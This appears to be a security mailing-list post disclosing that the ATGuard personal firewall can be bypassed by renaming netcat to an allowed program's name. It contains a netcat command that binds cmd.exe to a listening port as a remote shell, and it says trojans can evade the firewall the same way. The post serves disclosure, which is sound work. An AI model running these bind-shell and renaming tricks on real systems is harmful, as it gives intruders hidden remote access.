As far as i see the article you gave me at tooleaky.zensoft.com mostly deals with outbound connections. The ATGuard-Problem still goes futher, it is also a problem with inbound connections.
I use a Xitami Webserver on Port 50080 for testing purposes. This Xitami Webserver is (currently) allowed to accept all connections on all ports (this is also a configuration problem, but most people just allow inbound connections from any address to any port for an application). So, i just did the following: I:\>cd netcat I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l I tried to connect to port 500 with telnet: ATGuard fires up as it is supposed to. So, now i did the following: I:\netcat>copy nc.exe xiwin32.exe 1 Datei(en) kopiert. (Translation for the curious non-german readers : 1 File copied :) I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l Trying it with telnet again, i got a very nice shell without any notice from ATGuard. That's why i mentioned also trojan horses in my Advisories - just renaming your trojan horse to the name of a program that is allowed to accept inbound connections will do the trick. > There is no ultimate way to control all outbound communication. If you use > your own low-level drivers, no personal firewall can stop you. Surely there is no ultimate way. But if you are not aware that a problem exists, you can't think about solutions. Also, you perhaps will think that your personal firewall is perfectly safe while it isn't. Best regards, ------------------------------------------------------- BlueScreen / Florian Hobelsberger (UIN: 101782087) Member of: www.IT-Checkpoint.net www.Hackeinsteiger.de www.DvLdW.de ================================================================== To encrypt classified messages, please download and use this PGP-Key: http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt ==================================================================